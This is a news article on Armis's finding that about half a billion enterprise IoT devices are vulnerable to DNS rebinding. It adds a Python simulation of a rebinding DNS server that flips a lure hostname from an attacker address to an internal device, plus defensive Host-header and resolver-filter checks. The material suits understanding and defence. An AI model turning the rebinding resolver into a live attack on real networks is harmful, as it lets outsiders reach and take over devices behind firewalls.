Earlier this year it came to light that Google Home, Roku, Sonos, Chromecast, the Radio Thermostat CT50 and CT80 smart-home thermostats and all Blizzard games were vulnerable to DNS rebinding attacks. Now IoT security vendor Armis has warned that nearly half a billion “smart” devices are vulnerable to the decade-old DNS rebinding attack vector.
The vulnerabilities are “everywhere.” Because the roughly 496 million vulnerable devices span printers, smart TVs, streaming media players and speakers, IP cameras, IP phones, switches, routers and access points, Armis warned that “nearly all enterprises are susceptible” to DNS rebinding attacks. The attacks give remote attackers a way around the firewall and onto vulnerable devices on the local network, devices that were never meant to be reachable from the public internet.
Armis, which sounded the alarm about the BlueBorne attack vector last year, explained that DNS rebinding attacks allow remote attackers “to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with vulnerable devices on the local network.” Once an attacker has set up a DNS server for a domain they control and a victim is lured into visiting the site, or is served a malicious ad banner on a legitimate site, the attacker can use the victim’s browser as a proxy to reach devices on the internal network. The trick works because the browser’s same-origin policy keys on the hostname, not the IP address: when the attacker’s DNS server re-points that hostname at an internal address, the page’s scripts are still talking to the “same” origin as far as the browser is concerned.
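The resolver side of the attack described above, as an added example that is not part of the original article or of the Armis report. It simulates, in pure Python with no sockets, an authoritative DNS server for a hypothetical lure hostname (lure.example) that answers the first lookup from a given resolver with the attacker’s web server and every later lookup with an address inside the victim’s LAN; the attacker address (203.0.113.10), the internal target (192.168.1.20) and the client resolver addresses are constructed documentation-range values, and the one-query flip is a simplification, since real tooling has to wait out the browser’s own DNS cache before the second answer is honoured.

```python
import struct
from typing import Dict, List, Tuple

# Constructed addresses for the walk-through (TEST-NET ranges; not from the Armis report).
ATTACKER_IP = "203.0.113.10"     # public web server that serves the lure page and its JavaScript
TARGET_IP = "192.168.1.20"       # hypothetical internal device the attacker wants to reach
MALICIOUS_NAME = "lure.example"  # the one hostname the page's scripts will ever talk to


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard recursive A query for `name` (what a stub resolver sends)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_query(packet: bytes) -> Tuple[int, str, bytes]:
    """Return (transaction id, queried name, raw question section) of a DNS message."""
    txid = struct.unpack("!H", packet[:2])[0]
    pos, labels = 12, []
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    pos += 1 + 4  # root label, then QTYPE and QCLASS
    return txid, ".".join(labels), packet[12:pos]


def build_a_response(query: bytes, ip: str, ttl: int) -> bytes:
    """Answer `query` with a single A record; ttl=0 asks caches to discard it at once."""
    txid, _, question = parse_query(query)
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)  # QR, AA, RD, RA; 1 answer
    # Compressed name pointer to offset 12 (the question name), type A, class IN, TTL, RDLENGTH 4.
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + question + rr


def build_nxdomain(query: bytes) -> bytes:
    """NXDOMAIN (RCODE 3) for anything that is not the lure name."""
    txid, _, question = parse_query(query)
    return struct.pack("!HHHHHH", txid, 0x8583, 1, 0, 0, 0) + question


def parse_a_answer(packet: bytes) -> Tuple[str, int]:
    """Extract (ip, ttl) from the first answer of a response built by build_a_response."""
    _, _, question = parse_query(packet)
    pos = 12 + len(question)
    _, _, _, ttl, rdlen = struct.unpack("!HHHIH", packet[pos:pos + 12])
    rdata = packet[pos + 12:pos + 12 + rdlen]
    return ".".join(str(b) for b in rdata), ttl


class RebindingResolver:
    """Authoritative server for MALICIOUS_NAME whose answer depends on who asks, and how often."""

    def __init__(self) -> None:
        self.lookups: Dict[str, int] = {}  # querying resolver address -> queries seen so far

    def respond(self, client_ip: str, query: bytes) -> bytes:
        _, name, _ = parse_query(query)
        if name.lower() != MALICIOUS_NAME:
            return build_nxdomain(query)
        count = self.lookups.get(client_ip, 0)
        self.lookups[client_ip] = count + 1
        if count == 0:
            # First lookup: point the browser at the attacker's server so the page and its script load.
            return build_a_response(query, ATTACKER_IP, ttl=0)
        # Every later lookup: the *same* hostname now resolves inside the victim's LAN, so the
        # script's fetch("http://lure.example/...") is same-origin but lands on the internal device.
        return build_a_response(query, TARGET_IP, ttl=0)


def victim_lookup_sequence(resolver: RebindingResolver, client_ip: str, n: int) -> List[str]:
    """Addresses a browser behind `client_ip` would connect to across `n` lookups of the lure name."""
    query = build_query(MALICIOUS_NAME)
    return [parse_a_answer(resolver.respond(client_ip, query))[0] for _ in range(n)]


if __name__ == "__main__":
    resolver = RebindingResolver()
    print(victim_lookup_sequence(resolver, "198.51.100.7", 3))
```

The victim’s firewall never sees anything unusual: every connection originates from the browser inside the network, and the only outbound traffic is an ordinary DNS lookup and an HTTP request to the lure page. Note that the per-resolver counter is keyed on the address that sends the query, which in practice is the victim’s recursive resolver rather than the browser’s own machine.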
According to Armis, most manufacturers of the IoT devices commonly used in enterprises ship products that are vulnerable to DNS rebinding, an attack first described eleven years ago. The vulnerable devices put enterprises “at risk for attacks, data exfiltration, and take-over for a Mirai-like attack.”
165 million printers, or 66 percent, are vulnerable to DNS rebinding attacks. Armis named Hewlett Packard, Epson, Konica, Lexmark and Xerox as representative manufacturers shipping vulnerable printers.
160 million, or 75 percent, of IP cameras by manufacturers such as Axis Communications, GoPro, Sony and Vivotek are vulnerable.
The firm identified that 124 million, or 77 percent, of IP phones are vulnerable; manufacturers include Avaya, Cisco, Dell, NEC and Polycom.
28.1 million, or 57 percent, of smart TVs – Roku-integrated, Samsung and Vizio – are vulnerable.
14 million, or 87 percent, of switches, routers and access points are vulnerable; manufacturers include Cisco, Netgear, Extreme, Aruba and Avaya.
5.1 million, or 78 percent, of streaming media players and smart speakers by Apple, Google, Roku and Sonos are vulnerable.
Armis explained, “An example of a vulnerable device is one that is running an unauthenticated protocol like Universal Plug and Play (UPnP) or HTTP (used on unencrypted web servers). These protocols are commonly used to host administrative consoles (for routers, printers, IP cameras) or to allow easy access to the device’s services (for example, streaming video players), and are pervasive in businesses.”
One mitigation approach is to disable unneeded services such as UPnP, change device passwords and keep firmware updated. With hundreds of devices, that could be a time-consuming nightmare. The fastest approach Armis suggested was to monitor the devices for signs of compromise; Armis sells such a monitoring platform.
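Two checks a practitioner can add without touching every device’s password or firmware, as an added example that is not from the article, Armis or any vendor’s code: a device-side Host-header check, the standard fix for the unauthenticated HTTP consoles Armis describes (a rebound request still carries the lure hostname in its Host header, so a device that only answers to its own addresses or expected names refuses it), and a resolver-side rebind filter in the spirit of dnsmasq’s --stop-dns-rebind, which drops answers that map a public name to a private, loopback or link-local address. The device addresses, the hostname printer-01.lan and the lure name are constructed for the example.

```python
import ipaddress
from typing import Dict, Iterable, Optional, Tuple, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed values for this example, not taken from the Armis report.
DEVICE_ADDRESSES = {ipaddress.ip_address(a) for a in ("192.168.1.20", "127.0.0.1")}
DEVICE_HOSTNAMES = {"printer-01.lan"}

# Address ranges a public hostname has no business resolving to.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                  # IPv4 loopback, link-local
    "::1/128", "fc00::/7", "fe80::/10",               # IPv6 loopback, ULA, link-local
)]


def _unmap(addr: IPAddress) -> IPAddress:
    """Treat ::ffff:192.168.1.20 as 192.168.1.20 so the mapped form cannot slip past the checks."""
    mapped = getattr(addr, "ipv4_mapped", None)
    return mapped if mapped is not None else addr


def parse_host_header(value: str) -> Tuple[str, Optional[int]]:
    """Split a Host value ('name', 'name:port' or '[v6]:port') into (name, port)."""
    value = value.strip()
    if value.startswith("["):  # bracketed IPv6 literal
        end = value.find("]")
        if end == -1:
            raise ValueError("malformed IPv6 host")
        rest = value[end + 1:]
        return value[1:end], (int(rest[1:]) if rest.startswith(":") else None)
    name, sep, port = value.rpartition(":")
    if sep and port.isdigit():
        return name, int(port)
    return value, None


def host_header_allowed(host_header: Optional[str]) -> bool:
    """Device-side check: accept only a Host naming this device by its own IP or expected hostname."""
    if not host_header:
        return False  # HTTP/1.1 requires Host; a rebound browser request always carries one anyway
    name, _ = parse_host_header(host_header)
    name = name.lower().rstrip(".")
    try:
        return _unmap(ipaddress.ip_address(name)) in DEVICE_ADDRESSES
    except ValueError:  # not an IP literal, so it must be one of our configured names
        return name in DEVICE_HOSTNAMES


def handle_admin_request(headers: Dict[str, str]) -> int:
    """Minimal console handler: 421 Misdirected Request when Host names someone else, else 200."""
    host = next((v for k, v in headers.items() if k.lower() == "host"), None)
    return 200 if host_header_allowed(host) else 421


def is_rebind_answer(qname: str, answer_ip: str, internal_names: Iterable[str] = ()) -> bool:
    """Resolver-side check: True if a name outside the trusted internal zone resolves to a
    private, loopback or link-local address, which is exactly what a rebinding server returns."""
    if qname.lower().rstrip(".") in {n.lower().rstrip(".") for n in internal_names}:
        return False  # names we serve ourselves legitimately carry RFC 1918 addresses
    addr = _unmap(ipaddress.ip_address(answer_ip))
    return any(addr in net for net in BLOCKED_NETS)


if __name__ == "__main__":
    print(handle_admin_request({"Host": "lure.example"}))            # rebound request, refused
    print(handle_admin_request({"Host": "192.168.1.20"}))            # the device's own address
    print(is_rebind_answer("lure.example", "192.168.1.20"))          # answer a filter should drop
```

Both checks are written with explicit network lists rather than Python’s `is_private`, which also flags the documentation ranges used above and would make the example misleading. The Host-header check belongs in the device’s firmware, so on an existing fleet it only helps where the vendor ships it; the resolver filter can be deployed centrally today, with the internal zone whitelisted so that split-horizon DNS keeps working.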